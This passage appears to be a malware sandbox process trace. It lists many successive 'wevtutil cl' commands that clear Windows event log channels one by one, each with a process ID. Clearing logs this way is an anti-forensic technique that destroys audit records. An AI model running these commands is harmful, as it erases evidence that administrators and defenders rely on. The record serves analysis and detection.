WEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"
5⤵
PID:308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DhcpNap/Admin"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DhcpNap/Operational"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"
5⤵
PID:764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"
5⤵
PID:288

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
5⤵
PID:308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-TaskManager/Debug"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"
5⤵
PID:1792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DirectWrite-FontCache/Tracing"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DirectWrite/Tracing"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Disk/Operational"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"
5⤵
PID:792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"
5⤵
PID:1820

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Documents/Performance"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
5⤵
PID:764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxpTaskRingtone/Analytic"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EFS/Debug"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapHost/Debug"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapHost/Operational"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventLog/Debug"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FMS/Analytic"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FMS/Debug"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FMS/Operational"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Feedback-Service-TriggerProvider"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"
5⤵
PID:1168

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-GettingStarted/Diagnostic"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-GroupPolicy/Operational"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HAL/Debug"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HealthCenter/Debug"
5⤵
PID:1628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HealthCenter/Performance"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HealthCenterCPL/Performance"
5⤵
PID:1168

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Help/Operational"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel/Operational"
5⤵
PID:1628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Listener Service/Operational"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service/Operational"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup-ListenerService"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HotStart/Diagnostic"
5⤵
PID:1628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HttpService/Trace"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IKE/Operational"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IKEDBG/Debug"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IPBusEnum/Tracing"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IPSEC-SRV/Diagnostic"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-International/Operational"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Debug"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Operational"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Trace"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Acpi/Diagnostic"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Analytic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Disk/Analytic"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Admin"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Analytic"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-File/Analytic"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Memory/Analytic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Network/Analytic"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Diagnostic"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Diagnostic"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
5⤵
PID:688

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Operational"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Process/Analytic"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Analytic"
5⤵
PID:1628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Analytic"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Operational"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Analytic"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Debug"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Operational"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Errors"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Operational"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Known Folders API Service"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-L2NA/Diagnostic"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LDAP-Client/Debug"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Analytic"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Debug"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Operational"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MCT/Operational"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MPS-CLNT/Diagnostic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MPS-DRV/Diagnostic"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MPS-SRV/Diagnostic"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MSPaint/Debug"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MSPaint/Admin"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MSPaint/Diagnostic"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MUI/Admin"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MUI/Analytic"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MUI/Debug"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MUI/Operational"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
5⤵
PID:1476

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MobilityCenter/Performance"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NCSI/Analytic"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NCSI/Operational"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NDIS/Diagnostic"
5⤵
PID:1520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NDIS/Operational"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NTLM/Operational"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NWiFi/Diagnostic"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Narrator/Diagnostic"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetShell/Performance"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkAccessProtection/Operational"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkAccessProtection/WHC"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkLocationWizard/Operational"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Diagnostic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Operational"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Networking-Correlation/Diagnostic"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NlaSvc/Diagnostic"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NlaSvc/Operational"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OLEACC/Debug"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OLEACC/Diagnostic"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OOBE-Machine/Diagnostic"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Analytic"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Debug"
5⤵
PID:2020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Operational"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OfflineFiles/SyncLog"
5⤵
PID:792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OneX/Diagnostic"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OobeLdr/Analytic"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PCI/Diagnostic"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ParentalControls/Operational"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PeopleNearMe/Operational"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerCfg/Diagnostic"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerCpl/Diagnostic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell/Analytic"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell/Operational"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrimaryNetworkIcon/Performance"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrintService/Admin"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrintService/Debug"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrintService/Operational"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-QoS-Pacer/Diagnostic"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-QoS-qWAVE/Debug"
5⤵
PID:2020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RPC-Proxy/Debug"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RPC/Debug"
5⤵
PID:764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RPC/EEInfo"
5⤵
PID:908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Analytic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Operational"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Analytic"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Operational"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Recovery/Operational"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Admin"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Operational"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Tracing"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ResourcePublication/Tracing"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RestartManager/Operational"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
5⤵
PID:1476

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sens/Debug"
5⤵
